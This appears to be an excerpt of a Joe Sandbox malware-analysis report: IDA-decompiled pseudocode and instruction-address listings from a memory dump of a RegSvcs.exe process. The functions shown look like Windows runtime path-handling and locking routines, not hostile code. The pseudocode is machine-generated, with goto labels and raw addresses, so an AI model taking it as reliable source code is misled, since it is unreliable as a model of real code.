														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M018E45F8))) {
												case 0:
													_v568 = 0x18a1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x18a11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L018E4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0190F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0190F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E018C52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E018DEB70(1, 0x19b79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E018DAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E019095D0();
																			L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0190B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E01903D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0190B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x018e4128
0x018e4135
0x018e413c
0x018e4141
0x018e4145
0x018e4147
0x018e414e
0x018e4151
0x018e4159
0x018e415c
0x018e4160
0x018e4164
0x018e4168
0x018e416c
0x018e417f
0x018e4181
0x018e446a
0x018e446a
0x018e418c
0x018e4195
0x018e4199
0x018e4432
0x018e4439
0x018e443d
0x018e4442
0x018e4447
0x00000000
0x018e419f
0x018e41a3
0x018e41b1
0x018e41b9
0x018e41bd
0x018e45db
0x018e45db
0x00000000
0x018e41c3
0x018e41c3
0x018e41ce
0x018e41d4
0x0192e138
0x0192e13e
0x0192e169
0x0192e16d
0x0192e19e
0x0192e16f
0x0192e16f
0x0192e175
0x0192e179
0x0192e18f
0x0192e193
0x00000000
0x0192e199
0x00000000
0x0192e199
0x0192e193
0x00000000
0x00000000
0x00000000
0x018e41da
0x018e41da
0x018e41df
0x018e41e4
0x018e41ec
0x018e4203
0x018e4207
0x0192e1fd
0x018e4222
0x018e4226
0x0192e1f3
0x0192e1f3
0x018e422c
0x018e422c
0x018e4233
0x0192e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x018e4239
0x018e4239
0x018e4239
0x018e4239
0x018e4233
0x018e4226
0x018e41ee
0x018e41ee
0x018e41f4
0x018e4575
0x0192e1b1
0x0192e1b1
0x00000000
0x018e457b
0x018e457b
0x018e4582
0x0192e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x018e4588
0x018e4588
0x018e458c
0x0192e1c4
0x0192e1c4
0x00000000
0x018e4592
0x018e4592
0x018e4599
0x0192e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x018e459f
0x018e459f
0x018e45a3
0x0192e1d7
0x0192e1e4
0x00000000
0x018e45a9
0x018e45a9
0x018e45b0
0x0192e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x018e45b6
0x018e45b6
0x018e45b6
0x00000000
0x018e45b6
0x018e45b0
0x018e45a3
0x018e4599
0x018e458c
0x018e4582
0x00000000
0x00000000
0x00000000
0x00000000
0x018e41f4
0x018e423e
0x018e4241
0x018e45c0
0x018e45c4
0x00000000
0x018e45ca
0x018e45ca
0x00000000
0x0192e207
0x0192e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x018e45d1
0x00000000
0x00000000
0x018e45ca
0x00000000
0x018e4247
0x018e4247
0x018e4247
0x018e4249
0x018e4249
0x018e4249
0x018e4251
0x018e4251
0x018e4257
0x018e425f
0x018e426e
0x018e4270
0x018e427a
0x0192e219
0x0192e219
0x018e4280
0x018e4282
0x018e4456
0x018e45ea
0x00000000
0x018e45f0
0x0192e223
0x00000000
0x0192e223
0x018e445c
0x018e445c
0x00000000
0x018e445c
0x00000000
0x018e4288
0x018e428c
0x0192e298
0x018e4292
0x018e4292
0x018e429e
0x018e42a3
0x018e42a7
0x018e42ac
0x0192e22d
0x018e42b2
0x018e42b2
0x018e42b9
0x018e42bc
0x018e42c2
0x018e42ca
0x018e42cd
0x018e42cd
0x018e42d4
0x018e433f
0x018e433f
0x018e42d6
0x018e42d6
0x018e42d9
0x018e42dd
0x018e42eb
0x0192e23a
0x018e42f1
0x018e4305
0x018e430d
0x018e4315
0x018e4318
0x018e431f
0x018e4322
0x018e432e
0x018e433b
0x018e433b
0x00000000
0x018e432e
0x018e42eb
0x018e434c
0x018e434e
0x018e4352
0x018e4359
0x018e435e
0x018e4361
0x018e436e
0x018e438a
0x018e438e
0x018e4396
0x018e439e
0x018e43a1
0x018e43ad
0x018e43bb
0x018e43bb
0x018e43ad
0x018e436e
0x018e43bf
0x018e43c5
0x018e4463
0x018e4463
0x018e43ce
0x018e43d5
0x018e43d9
0x018e43df
0x018e4475
0x018e4479
0x018e4491
0x018e4491
0x018e4479
0x018e43e5
0x018e43eb
0x018e43f4
0x018e43f6
0x018e43f9
0x018e43fc
0x018e43ff
0x018e44e8
0x018e44ed
0x018e44f3
0x0192e247
0x00000000
0x018e44f9
0x018e4504
0x018e4508
0x018e450f
0x0192e269
0x00000000
0x018e4515
0x018e4519
0x018e4531
0x018e4534
0x018e4537
0x018e453e
0x018e4541
0x018e454a
0x0192e255
0x0192e255
0x0192e25b
0x0192e25e
0x0192e261
0x0192e261
0x018e4555
0x018e4559
0x018e455d
0x0192e26d
0x0192e270
0x0192e274
0x0192e27a
0x0192e27d
0x0192e28e
0x0192e28e
0x018e4563
0x018e4563
0x018e4569
0x018e4569
0x00000000
0x018e455d
0x018e450f
0x00000000
0x018e44f3
0x018e43ff
0x018e4405
0x018e4405
0x018e4405
0x018e42ac
0x018e428c
0x018e4282
0x018e4407
0x018e440d
0x0192e2af
0x0192e2af
0x018e4413
0x018e4413
0x00000000
0x018e41d4
0x00000000
0x018e41c3
0x018e41bd
0x018e4415
0x018e4415
0x018e4416
0x018e4417
0x018e4429
0x018e416e
0x018e416e
0x018e4175
0x018e4498
0x018e449f
0x0192e12d
0x00000000
0x0192e133
0x00000000
0x0192e133
0x018e44a5
0x018e44a5
0x018e44aa
0x00000000
0x018e44bb
0x018e44ca
0x018e44d6
0x018e44d7
0x018e44d8
0x018e44e3
0x018e44e3
0x018e44aa
0x018e417b
0x018e417b
0x018e417b
0x00000000
0x018e417b
0x018e4175
0x00000000

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aca2465fa0301918ef56a0e26dcc4fa58aadf8727c734f992a7b2fcca4b0e6e
Instruction ID: 29c8cf231c019b6db884465e5cb4f12283f54f0c8f84df826c4b0b4c8e85491f
Opcode Fuzzy Hash: 4aca2465fa0301918ef56a0e26dcc4fa58aadf8727c734f992a7b2fcca4b0e6e
Instruction Fuzzy Hash: DEF19F706083118FD725CF18C484A7AB7E1FF9A718F14492EF98ACB291E734DA85CB52

Uniqueness

Uniqueness Score: -1.00%

Function 018F20A0 Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E018F20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x19b8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E018F2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E018F2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E018C58EC(_t240);
									_t221 =  *0x19b5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x19b5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E01904A2C(0x19b6e40, 0x1904b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E018E7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x18a5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E018FF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E018FF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01947016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L018E2400(_t267 + 0x20);
															}
															L018E2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E018F2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E018E2280(_t134, 0x19b8608);
									__eflags =  *0x19b6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E018DFFB0(_t198, _t241, 0x19b8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x19b6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x19b8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E018F6B90(_t210,  &_v64);
										_t262 =  *0x19b8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E018FE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E019097C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0190006A(0x19b8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x19b8608);
												E0190B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x19b6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x19b6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E018DFFB0(_t198, _t240, 0x19b8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E019000C2(0x19b8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x018f20a0
0x018f20a8
0x018f20ad
0x018f20b3
0x018f20b8
0x018f20c2
0x018f20c7
0x018f20cb
0x018f20d2
0x018f2263
0x018f2266
0x01935836
0x01935836
0x00000000
0x018f226c
0x018f226c
0x018f2270
0x018f2274
0x018f20e2
0x018f20e2
0x018f20e6
0x018f20ee
0x019357dc
0x019357de
0x019357ec
0x019357ec
0x019357f1
0x019357f3
0x019357f8
0x00000000
0x019357f8
0x019357e0
0x019357e4
0x019357ea
0x00000000
0x00000000
0x00000000
0x019357ea
0x018f20f4
0x018f20f4
0x018f20f8
0x018f20f8
0x018f20fc
0x018f2100
0x018f2106
0x018f2201
0x018f2206
0x018f220b
0x018f220e
0x018f22a9
0x018f22ac
0x00000000
0x00000000
0x018f22b2
0x018f22b5
0x01935801
0x01935806
0x00000000
0x00000000
0x01935810
0x01935815
0x01935818
0x00000000
0x00000000
0x0193581e
0x018f22bb
0x018f22bb
0x018f2218
0x018f2218
0x018f221c
0x018f2220
0x018f2222
0x018f22c2
0x018f22c4
0x018f22dc
0x018f22dc
0x018f22e1
0x00000000
0x00000000
0x00000000
0x018f22e7
0x018f22c8
0x018f22cd
0x018f22d3
0x018f22d6
0x01935823
0x01935825
0x01935827
0x00000000
0x00000000
0x0193582d
0x00000000
0x0193582d
0x00000000
0x018f2228
0x018f2228
0x00000000
0x018f2228
0x018f2222
0x018f2214
0x018f2214
0x00000000
0x018f2114
0x018f2114
0x018f2114
0x018f211a
0x018f211c
0x018f2348
0x018f234d
0x01935840
0x01935845
0x01935848
0x0193584e
0x0193584e
0x01935848
0x018f2353
0x018f2355
0x018f2388
0x018f2388
0x018f2368
0x018f236a
0x018f236c
0x018f238f
0x00000000
0x018f236e
0x018f236e
0x018f218e
0x018f218e
0x018f2191
0x018f2195
0x01935a03
0x01935a06
0x01935a0c
0x01935a0f
0x01935a11
0x01935a13
0x01935a13
0x01935a19
0x01935a1f
0x00000000
0x018f219b
0x018f219b
0x018f21a0
0x018f2282
0x018f2284
0x018f2284
0x018f2284
0x018f2284
0x018f21a6
0x018f21a9
0x018f21ac
0x018f21ae
0x018f21b3
0x018f228b
0x018f2290
0x018f2379
0x018f2296
0x018f2298
0x018f2298
0x018f2290
0x018f21b9
0x018f21be
0x018f22a2
0x018f22a2
0x018f21c4
0x018f21c8
0x018f21cc
0x018f21d0
0x018f21d4
0x018f21de
0x018f21e3
0x01935a29
0x01935a2c
0x00000000
0x00000000
0x01935a3b
0x00000000
0x018f21e9
0x018f21e9
0x018f21e9
0x018f21ee
0x018f21f1
0x01935a45
0x01935a4b
0x01935a52
0x01935a58
0x01935a5d
0x01935a5f
0x01935a71
0x01935a61
0x01935a6a
0x01935a6a
0x01935a76
0x01935a79
0x01935a7f
0x01935a83
0x01935a85
0x01935a87
0x01935a87
0x01935a8c
0x01935a91
0x01935a97
0x01935a9f
0x01935aa0
0x01935aa1
0x01935aa6
0x01935aab
0x01935ab1
0x01935ab3
0x01935ab9
0x01935aca
0x01935ad4
0x01935ad4
0x01935ade
0x01935ade
0x01935aab
0x01935a79
0x01935a52
0x018f21f7
0x018f21f9
0x018f21fe
0x018f21fe
0x018f21e3
0x018f2195
0x018f236c
0x018f2122
0x018f2122
0x018f2124
0x018f2231
0x018f2236
0x018f2236
0x018f2238
0x018f2238
0x018f2240
0x018f2242
0x018f2244
0x019359fc
0x018f218c
0x018f218c
0x00000000
0x018f218c
0x018f224a
0x018f224f
0x018f2256
0x018f2304
0x018f2309
0x018f230f
0x018f231e
0x018f231e
0x018f231e
0x018f2320
0x018f2325
0x018f232a
0x018f232c
0x018f233e
0x018f233e
0x00000000
0x018f232c
0x018f2311
0x018f2317
0x018f231a
0x018f231c
0x018f2380
0x018f2380
0x018f2380
0x018f2384
0x00000000
0x00000000
0x018f2386
0x00000000
0x018f231c
0x018f225c
0x018f225c
0x00000000
0x018f225c
0x018f212a
0x018f2134
0x018f2138
0x018f213d
0x01935858
0x01935863
0x01935863
0x01935867
0x0193586a
0x00000000
0x00000000
0x0193586c
0x0193586c
0x01935871
0x01935875
0x01935877
0x01935997
0x0193599c
0x019359a1
0x019359a7
0x019359a7
0x00000000
0x019359a7
0x0193587d
0x00000000
0x0193588b
0x0193588b
0x01935890
0x01935892
0x01935894
0x01935899
0x0193589b
0x019358a0
0x019358a0
0x019358aa
0x019358b2
0x019358b6
0x019358be
0x019358c6
0x019358c9
0x0193590d
0x01935917
0x0193591a
0x0193591c
0x01935920
0x01935928
0x0193592a
0x0193592c
0x0193592e
0x0193592e
0x019358cb
0x019358cd
0x019358d8
0x019358e0
0x019358f4
0x019358fe
0x019358fe
0x0193593a
0x0193593e
0x01935940
